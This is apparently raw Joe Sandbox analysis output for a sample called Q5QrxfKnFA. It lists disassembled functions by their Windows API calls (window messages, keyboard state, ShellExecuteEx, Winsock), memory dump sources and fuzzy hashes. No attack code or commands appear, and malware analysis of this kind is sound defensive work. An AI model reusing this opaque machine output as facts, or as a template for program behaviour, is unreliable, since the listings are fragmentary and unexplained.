                                                        • Instruction ID: ce7bbfed17c9b6a77b97161935c940b6bb9573fef6c45b031da628d3ff6f9d83
                                                        • Opcode Fuzzy Hash: 036a273c620e56d8e32156473674f6a83e9ff9b9fbacd77fba88ff930c8ee019
                                                        • Instruction Fuzzy Hash: B141B1312002009FDB12EF28CC96FAEBBE9AF41314F048419FA029F2D2CB75E804CB91
                                                        APIs
                                                        • LoadIconW.USER32(00000000,00007F03), ref: 003A3033
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2131995011.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                        • Associated: 00000000.00000002.2131834515.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132171077.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132193214.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_340000_Q5QrxfKnFA.jbxd
                                                        Similarity
                                                        • API ID: IconLoad
                                                        • String ID: blank$info$question$stop$warning
                                                        • API String ID: 2457776203-404129466
                                                        • Opcode ID: a8c8304c8257f440c045441e4b9bf04e2a0b3939b0c3317ca81b976dc39b159c
                                                        • Instruction ID: 227a865b8769703e0b7cbdda83d35f6c805613fcda0774b9d0f3c74275f8fa14
                                                        • Opcode Fuzzy Hash: a8c8304c8257f440c045441e4b9bf04e2a0b3939b0c3317ca81b976dc39b159c
                                                        • Instruction Fuzzy Hash: 6D11273534874ABEE71BDB18DC42CAB7B9CDF17360F21402AFA05AA181DB71AF4056A1
                                                        APIs
                                                        • GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 003A4312
                                                        • LoadStringW.USER32(00000000), ref: 003A4319
                                                        • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 003A432F
                                                        • LoadStringW.USER32(00000000), ref: 003A4336
                                                        • _wprintf.LIBCMT ref: 003A435C
                                                        • MessageBoxW.USER32(00000000,?,?,00011010), ref: 003A437A
                                                        Strings
                                                        • %s (%d) : ==> %s: %s %s, xrefs: 003A4357
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2131995011.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                        • Associated: 00000000.00000002.2131834515.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132171077.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132193214.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_340000_Q5QrxfKnFA.jbxd
                                                        Similarity
                                                        • API ID: HandleLoadModuleString$Message_wprintf
                                                        • String ID: %s (%d) : ==> %s: %s %s
                                                        • API String ID: 3648134473-3128320259
                                                        • Opcode ID: 0b00bd2486e6844e4bc4a80e64d3e60ac6d50ebe811a0d394cbd584bdc49e01d
                                                        • Instruction ID: c5f8bbf88470f99a6b88b27953208bfcbf79a9cef841a66cfc19a1f6a4242933
                                                        • Opcode Fuzzy Hash: 0b00bd2486e6844e4bc4a80e64d3e60ac6d50ebe811a0d394cbd584bdc49e01d
                                                        • Instruction Fuzzy Hash: 990162F6900208BFEB52ABA0DD89EF7776CDB08300F0005A5B745E6051EA756E954B74
                                                        APIs
                                                          • Part of subcall function 00342612: GetWindowLongW.USER32(?,000000EB), ref: 00342623
                                                        • GetSystemMetrics.USER32(0000000F), ref: 003CD47C
                                                        • GetSystemMetrics.USER32(0000000F), ref: 003CD49C
                                                        • MoveWindow.USER32(00000003,?,?,?,?,00000000,?,?,?), ref: 003CD6D7
                                                        • SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 003CD6F5
                                                        • SendMessageW.USER32(00000003,00000469,?,00000000), ref: 003CD716
                                                        • ShowWindow.USER32(00000003,00000000), ref: 003CD735
                                                        • InvalidateRect.USER32(?,00000000,00000001), ref: 003CD75A
                                                        • DefDlgProcW.USER32(?,00000005,?,?), ref: 003CD77D
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2131995011.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                        • Associated: 00000000.00000002.2131834515.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132171077.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132193214.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_340000_Q5QrxfKnFA.jbxd
                                                        Similarity
                                                        • API ID: Window$MessageMetricsSendSystem$InvalidateLongMoveProcRectShow
                                                        • String ID:
                                                        • API String ID: 1211466189-0
                                                        • Opcode ID: 73fda0e1e69f5ad070fa247140701fb4124f4bfab8045a302fb9af118724e6cb
                                                        • Instruction ID: 0a80f03da053b2bdd44a64c2e1cccfc2d99468236810353a22535ec9df483b0e
                                                        • Opcode Fuzzy Hash: 73fda0e1e69f5ad070fa247140701fb4124f4bfab8045a302fb9af118724e6cb
                                                        • Instruction Fuzzy Hash: 9BB17971600225AFDF16CF68C985BAA7BB1BF44701F098079FD48EA695DB34AD50CB90
                                                        APIs
                                                        • ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,0037C1C7,00000004,00000000,00000000,00000000), ref: 00342ACF
                                                        • ShowWindow.USER32(FFFFFFFF,00000000,00000000,00000000,?,0037C1C7,00000004,00000000,00000000,00000000,000000FF), ref: 00342B17
                                                        • ShowWindow.USER32(FFFFFFFF,00000006,00000000,00000000,?,0037C1C7,00000004,00000000,00000000,00000000), ref: 0037C21A
                                                        • ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,0037C1C7,00000004,00000000,00000000,00000000), ref: 0037C286
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2131995011.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                        • Associated: 00000000.00000002.2131834515.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132171077.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132193214.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_340000_Q5QrxfKnFA.jbxd
                                                        Similarity
                                                        • API ID: ShowWindow
                                                        • String ID:
                                                        • API String ID: 1268545403-0
                                                        • Opcode ID: 56e7d850df2997e18a974218ff0275915716892efd6cb6abf17bba80891322ef
                                                        • Instruction ID: dd32e05bcba1d104ed7ac11883357ef170d1a075de52fc9b482a50db2e7a6e65
                                                        • Opcode Fuzzy Hash: 56e7d850df2997e18a974218ff0275915716892efd6cb6abf17bba80891322ef
                                                        • Instruction Fuzzy Hash: 7E410B316146809ECB379B288C8CB6B7BDAEB45300F95C81DF44BAE961CA75B845D711
                                                        APIs
                                                        • InterlockedExchange.KERNEL32(?,000001F5), ref: 003A70DD
                                                          • Part of subcall function 00360DB6: std::exception::exception.LIBCMT ref: 00360DEC
                                                          • Part of subcall function 00360DB6: __CxxThrowException@8.LIBCMT ref: 00360E01
                                                        • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,?,00000000), ref: 003A7114
                                                        • EnterCriticalSection.KERNEL32(?), ref: 003A7130
                                                        • _memmove.LIBCMT ref: 003A717E
                                                        • _memmove.LIBCMT ref: 003A719B
                                                        • LeaveCriticalSection.KERNEL32(?), ref: 003A71AA
                                                        • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,00000000,00000000), ref: 003A71BF
                                                        • InterlockedExchange.KERNEL32(?,000001F6), ref: 003A71DE
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2131995011.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                        • Associated: 00000000.00000002.2131834515.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132171077.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132193214.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_340000_Q5QrxfKnFA.jbxd
                                                        Similarity
                                                        • API ID: CriticalExchangeFileInterlockedReadSection_memmove$EnterException@8LeaveThrowstd::exception::exception
                                                        • String ID:
                                                        • API String ID: 256516436-0
                                                        • Opcode ID: 24f7a618bb6559ebfdae0e0fc86abbe04b66894d60bea4ef23e49ca12c6fbd88
                                                        • Instruction ID: f7387647d9c8bcc3a7d233fe54b793fbe1847e9e26815bff9828ff97b5547903
                                                        • Opcode Fuzzy Hash: 24f7a618bb6559ebfdae0e0fc86abbe04b66894d60bea4ef23e49ca12c6fbd88
                                                        • Instruction Fuzzy Hash: 21316D75900205EFCB06DFA4DC86EAFB7B9EF45310F1481B5E904EB246DB30AA10CBA0
                                                        APIs
                                                        • DeleteObject.GDI32(00000000), ref: 003C61EB
                                                        • GetDC.USER32(00000000), ref: 003C61F3
                                                        • GetDeviceCaps.GDI32(00000000,0000005A), ref: 003C61FE
                                                        • ReleaseDC.USER32(00000000,00000000), ref: 003C620A
                                                        • CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 003C6246
                                                        • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 003C6257
                                                        • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,003C902A,?,?,000000FF,00000000,?,000000FF,?), ref: 003C6291
                                                        • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 003C62B1
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2131995011.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                        • Associated: 00000000.00000002.2131834515.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132171077.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132193214.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_340000_Q5QrxfKnFA.jbxd
                                                        Similarity
                                                        • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                                                        • String ID:
                                                        • API String ID: 3864802216-0
                                                        • Opcode ID: 999a8ac61cb536eaf1df8ac85787bf78de2236f9fcb8eca03461dc1bde07fe23
                                                        • Instruction ID: de0db65f86ffed5b0b18f40f21292657b1129b8ea61dd25e3c83d9b8601b28f8
                                                        • Opcode Fuzzy Hash: 999a8ac61cb536eaf1df8ac85787bf78de2236f9fcb8eca03461dc1bde07fe23
                                                        • Instruction Fuzzy Hash: 5E314F72101214BFEB128F50CC8AFEA3BAEEF49765F054065FE48DA291C675AC51CB64
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2131995011.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                        • Associated: 00000000.00000002.2131834515.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132171077.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132193214.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_340000_Q5QrxfKnFA.jbxd
                                                        Similarity
                                                        • API ID: _memcmp
                                                        • String ID:
                                                        • API String ID: 2931989736-0
                                                        • Opcode ID: a8ef88c1a00a2ee9d5cc1b230fa33d3e5420aa9b97449359d7d2086e5ade354c
                                                        • Instruction ID: 371fbe598280f1ea57a5767b2f1f2d5c1327497e7c315e8d9214f80d51d1c451
                                                        • Opcode Fuzzy Hash: a8ef88c1a00a2ee9d5cc1b230fa33d3e5420aa9b97449359d7d2086e5ade354c
                                                        • Instruction Fuzzy Hash: 0021A7A26012057BEA076612BE42FFBF36D9E603C8F098021FD049B68BEF54DE1185B1
                                                        APIs
                                                          • Part of subcall function 00349837: __itow.LIBCMT ref: 00349862
                                                          • Part of subcall function 00349837: __swprintf.LIBCMT ref: 003498AC
                                                          • Part of subcall function 0035FC86: _wcscpy.LIBCMT ref: 0035FCA9
                                                        • _wcstok.LIBCMT ref: 003AEC94
                                                        • _wcscpy.LIBCMT ref: 003AED23
                                                        • _memset.LIBCMT ref: 003AED56
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2131995011.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                        • Associated: 00000000.00000002.2131834515.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132171077.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132193214.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_340000_Q5QrxfKnFA.jbxd
                                                        Similarity
                                                        • API ID: _wcscpy$__itow__swprintf_memset_wcstok
                                                        • String ID: X
                                                        • API String ID: 774024439-3081909835
                                                        • Opcode ID: 71b50d2f161b57d1f919c72d197d0b17a4332802b1f5950e6e286c2a5a2e4bb4
                                                        • Instruction ID: c81d6ee07a9233681d789ce918d6c9ee11bedddf5c590abacb322ab55fd61942
                                                        • Opcode Fuzzy Hash: 71b50d2f161b57d1f919c72d197d0b17a4332802b1f5950e6e286c2a5a2e4bb4
                                                        • Instruction Fuzzy Hash: 7FC15B716087009FC766EF24C885A6AB7E4EF85310F01492DF8999F2A2DB71EC45CB82
                                                        APIs
                                                        • __WSAFDIsSet.WSOCK32(00000000,?), ref: 003B6C00
                                                        • #17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 003B6C21
                                                        • WSAGetLastError.WSOCK32(00000000), ref: 003B6C34
                                                        • htons.WSOCK32(?), ref: 003B6CEA
                                                        • inet_ntoa.WSOCK32(?), ref: 003B6CA7
                                                          • Part of subcall function 0039A7E9: _strlen.LIBCMT ref: 0039A7F3
                                                          • Part of subcall function 0039A7E9: _memmove.LIBCMT ref: 0039A815
                                                        • _strlen.LIBCMT ref: 003B6D44
                                                        • _memmove.LIBCMT ref: 003B6DAD
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2131995011.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                        • Associated: 00000000.00000002.2131834515.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132171077.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132193214.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_340000_Q5QrxfKnFA.jbxd
                                                        Similarity
                                                        • API ID: _memmove_strlen$ErrorLasthtonsinet_ntoa
                                                        • String ID:
                                                        • API String ID: 3619996494-0
                                                        • Opcode ID: 1a547041148f1f3c31c833159c4af35f30700087aa7c7d9b48254f49ccdcdafd
                                                        • Instruction ID: 48926cfb1bae8bc0d1c15cc650fbc91a6955937b89ec5af6abf78233caf91d04
                                                        • Opcode Fuzzy Hash: 1a547041148f1f3c31c833159c4af35f30700087aa7c7d9b48254f49ccdcdafd
                                                        • Instruction Fuzzy Hash: A7819D71604200ABC712EB24CC86FABB7E9AF84718F144A1DFA559F293DB74AD05CB91
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2131995011.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                        • Associated: 00000000.00000002.2131834515.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132171077.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132193214.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_340000_Q5QrxfKnFA.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 5c7c62057d4f1fb004d4c4afa8cd903f41f9375637c2f9f1c9d37f83d4e3b665
                                                        • Instruction ID: 06d4ae3ce82088368f10aefacf55c1b70daef003674bf6f8229b592c3b486884
                                                        • Opcode Fuzzy Hash: 5c7c62057d4f1fb004d4c4afa8cd903f41f9375637c2f9f1c9d37f83d4e3b665
                                                        • Instruction Fuzzy Hash: F7717A30900509EFCB16CF99CC89EBEBBB9FF85314F158159F915AA251C734AA91CBA0
                                                        APIs
                                                        • IsWindow.USER32(00C4D508), ref: 003CB3EB
                                                        • IsWindowEnabled.USER32(00C4D508), ref: 003CB3F7
                                                        • SendMessageW.USER32(?,0000041C,00000000,00000000), ref: 003CB4DB
                                                        • SendMessageW.USER32(00C4D508,000000B0,?,?), ref: 003CB512
                                                        • IsDlgButtonChecked.USER32(?,?), ref: 003CB54F
                                                        • GetWindowLongW.USER32(00C4D508,000000EC), ref: 003CB571
                                                        • SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 003CB589
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2131995011.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                        • Associated: 00000000.00000002.2131834515.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132171077.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132193214.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_340000_Q5QrxfKnFA.jbxd
                                                        Similarity
                                                        • API ID: MessageSendWindow$ButtonCheckedEnabledLong
                                                        • String ID:
                                                        • API String ID: 4072528602-0
                                                        • Opcode ID: 328b04e1f18b541abf65acf2ff8d4fb301943fe7c9c8b78566aaf2fe0614a597
                                                        • Instruction ID: 255aea1f59b2bc5fc4c4abd1273194c1f5c8485ce050c62797a5ab2c0e11fccf
                                                        • Opcode Fuzzy Hash: 328b04e1f18b541abf65acf2ff8d4fb301943fe7c9c8b78566aaf2fe0614a597
                                                        • Instruction Fuzzy Hash: 1171A034608644EFDB269F65C896FBAFBB9EF09300F15406DE945D72A2CB31AC50DB50
                                                        APIs
                                                        • _memset.LIBCMT ref: 003BF448
                                                        • _memset.LIBCMT ref: 003BF511
                                                        • ShellExecuteExW.SHELL32(?), ref: 003BF556
                                                          • Part of subcall function 00349837: __itow.LIBCMT ref: 00349862
                                                          • Part of subcall function 00349837: __swprintf.LIBCMT ref: 003498AC
                                                          • Part of subcall function 0035FC86: _wcscpy.LIBCMT ref: 0035FCA9
                                                        • GetProcessId.KERNEL32(00000000), ref: 003BF5CD
                                                        • CloseHandle.KERNEL32(00000000), ref: 003BF5FC
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2131995011.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                        • Associated: 00000000.00000002.2131834515.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132171077.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132193214.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_340000_Q5QrxfKnFA.jbxd
                                                        Similarity
                                                        • API ID: _memset$CloseExecuteHandleProcessShell__itow__swprintf_wcscpy
                                                        • String ID: @
                                                        • API String ID: 3522835683-2766056989
                                                        • Opcode ID: aa994f7568c81e3dbbf36fb3f9d94091b2b5faaa606d20a4c1f14df0d959929b
                                                        • Instruction ID: eabca6fe3aa22660c87c79f4a4fb657c08863e4e819a9d31426f7a288a77ea7b
                                                        • Opcode Fuzzy Hash: aa994f7568c81e3dbbf36fb3f9d94091b2b5faaa606d20a4c1f14df0d959929b
                                                        • Instruction Fuzzy Hash: EB61BD75A006189FCB16DF68C881AAEBBF5FF49314F11806AE819AF751CB30AD41CB80
                                                        APIs
                                                        • GetParent.USER32(?), ref: 003A0F8C
                                                        • GetKeyboardState.USER32(?), ref: 003A0FA1
                                                        • SetKeyboardState.USER32(?), ref: 003A1002
                                                        • PostMessageW.USER32(?,00000101,00000010,?), ref: 003A1030
                                                        • PostMessageW.USER32(?,00000101,00000011,?), ref: 003A104F
                                                        • PostMessageW.USER32(?,00000101,00000012,?), ref: 003A1095
                                                        • PostMessageW.USER32(?,00000101,0000005B,?), ref: 003A10B8
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2131995011.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                        • Associated: 00000000.00000002.2131834515.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132171077.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132193214.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_340000_Q5QrxfKnFA.jbxd
                                                        Similarity
                                                        • API ID: MessagePost$KeyboardState$Parent
                                                        • String ID:
                                                        • API String ID: 87235514-0
                                                        • Opcode ID: cf854c31ca6a169bf82c9ee500e14fefd5c0b2bc09a85bf95e5cc8ecc456da37
                                                        • Instruction ID: 64550a555d20f47cce4f2cc7bb4dbc6e32855bd6c5ffe0b1bd6801de037ffa8f
                                                        • Opcode Fuzzy Hash: cf854c31ca6a169bf82c9ee500e14fefd5c0b2bc09a85bf95e5cc8ecc456da37
                                                        • Instruction Fuzzy Hash: 6A51E3A05047D53DFB3782348C19BBABFA99B07304F098589E1D59A8D3C2D9ECD8D751
                                                        APIs
                                                        • GetParent.USER32(00000000), ref: 003A0DA5
                                                        • GetKeyboardState.USER32(?), ref: 003A0DBA
                                                        • SetKeyboardState.USER32(?), ref: 003A0E1B
                                                        • PostMessageW.USER32(00000000,00000100,00000010,?), ref: 003A0E47
                                                        • PostMessageW.USER32(00000000,00000100,00000011,?), ref: 003A0E64
                                                        • PostMessageW.USER32(00000000,00000100,00000012,?), ref: 003A0EA8
                                                        • PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 003A0EC9
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2131995011.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                        • Associated: 00000000.00000002.2131834515.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132171077.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132193214.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_340000_Q5QrxfKnFA.jbxd
                                                        Similarity
                                                        • API ID: MessagePost$KeyboardState$Parent
                                                        • String ID:
                                                        • API String ID: 87235514-0
                                                        • Opcode ID: 5f7c454ccb05221c6f57e7b836471d9b8ff98b61f65c13fe014e7ed6c0874ac8
                                                        • Instruction ID: 18ab18860e1ea6baef845cf6cb642b09e5e3c0df9aa2051149fb0e602cd71837
                                                        • Opcode Fuzzy Hash: 5f7c454ccb05221c6f57e7b836471d9b8ff98b61f65c13fe014e7ed6c0874ac8
                                                        • Instruction Fuzzy Hash: EB51E4A1544BD53DFB3B87748C55F7ABEA9DB07300F088889E1D49A8C2D395EC98E750
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2131995011.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                        • Associated: 00000000.00000002.2131834515.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132171077.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132193214.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_340000_Q5QrxfKnFA.jbxd
                                                        Similarity
                                                        • API ID: _wcsncpy$LocalTime
                                                        • String ID:
                                                        • API String ID: 2945705084-0
                                                        • Opcode ID: 92c5e092d48397e7f98f5afac69c0d36716b531c98fe12720ccc2dd58b98494d
                                                        • Instruction ID: 38bec1c6b5d8ab4f0620b28d571002c2d164baed600709c427645d3353319f57
                                                        • Opcode Fuzzy Hash: 92c5e092d48397e7f98f5afac69c0d36716b531c98fe12720ccc2dd58b98494d
                                                        • Instruction Fuzzy Hash: 1941A265C1061876CB13EBF48C869CFB3B8DF06310F50C966E609E7265EB35A245C7AA
                                                        APIs
                                                        • CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 0039D5D4
                                                        • SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 0039D60A
                                                        • GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 0039D61B
                                                        • SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 0039D69D
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2131995011.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                        • Associated: 00000000.00000002.2131834515.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
